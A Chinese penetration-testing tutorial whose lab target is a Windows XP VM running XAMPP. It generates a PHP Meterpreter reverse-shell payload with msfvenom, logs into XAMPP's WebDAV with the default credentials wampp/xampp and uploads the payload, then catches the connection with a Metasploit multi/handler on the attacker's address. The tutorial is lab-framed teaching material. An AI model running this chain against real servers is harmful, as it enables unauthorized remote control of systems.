龙空技术网

使用WebDav默认口令上传php远控,不用双击运行也能拿到shell

小白嘿客 293

前言:

目前我们对“apache配置webdav用户”大概比较着重,看官们都需要学习一些“apache配置webdav用户”的相关文章。那么小编同时在网络上搜集了一些对于“apache配置webdav用户””的相关内容,希望我们能喜欢,大家快快来了解一下吧!

用于网络安全渗透测试,禁止用于不当目的!

测试环境

之前我们搭建的测试靶机xp,已经内置了XAMPP web服务器组件。

在这个XAMPP组件中,大家可以看到安装有phpMyAdmin软件,它是一个网页版的数据库管理平台,显然我们可以看到xp安装了apache服务,支持web形式的访问和数据支持,另外还有php组件,说明只要通过任何浏览器访问xp的web服务页面地址路径(通常指定一个php后缀的文件),就能打开php的文件。

攻击思路:

既然xp安装了xampp,等同于可以运行php后缀的文件,我们只要通过一些技术手段上传一个php载荷小马即可,这种php载荷是不用在目标靶机进行运行的,我们只需要在本地kali进行远程触发即可(因为php或者jsp类型的文件本来就是放在web服务器根目录中让他人通过浏览器进行访问读取的!懂?)

注意:xp靶机的xampp必须开启!

实战测试生成windows平台php远控

kali终端下输入:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888 -f raw > xiaobai.php
发送远控

这里我们需要上传xiaobai.php小马到我们的xp服务器(xampp)中。

那如何实现上传呢?

其实在xp上安装的这个xampp存在WebDAV服务器程序,而且这个版本xampp的WebDAV口令都是默认的(一般不会更改)(一般web扫描软件并不会发现)

WebDAV是一个分布式文件管理服务器,用于上下传文件使用的。我们可以使用kali自带的客户端Cadaver程序来进行连接。

Kali终端下输入:

cadaver

默认的用户名是:wampp,密码是xampp!

如图:你发现已经成功进行了连接,而且还能使用ls命令查看当前webdav目录下的文件,甚至可以删除、上传、下载!这就是我们的一个突破口!

在webdav的当前终端下输入:

即可显示所有支持的命令!我们这里选择put命令,上传kali的php小马上去!

输入:

put xiaobai.php

你会发现已经成功上传我们的php载荷到xp的webdav服务器中了,你可以使用ls再次查看!

设置msf监听

Kali终端下输入:

msfconsole,启动metasploit

设置相关侦听模块和载荷以及参数

use multi/handlerset payload php/meterpreter/reverse_tcpset LHOSTS 192.168.31.251set LPORT 8888run

提示:这里的meterpreter会话有时候不一定会建立成功,但是这种攻击方法,你一定要会,在web渗透中,这就是常用的伎俩。

关注小白嘿客,学习完整的web渗透,可以点击《白帽黑客web渗透指南》进入我的嘿客专栏获得永久学习哦!

欢迎点赞、评论、转发!

标签: #apache配置webdav用户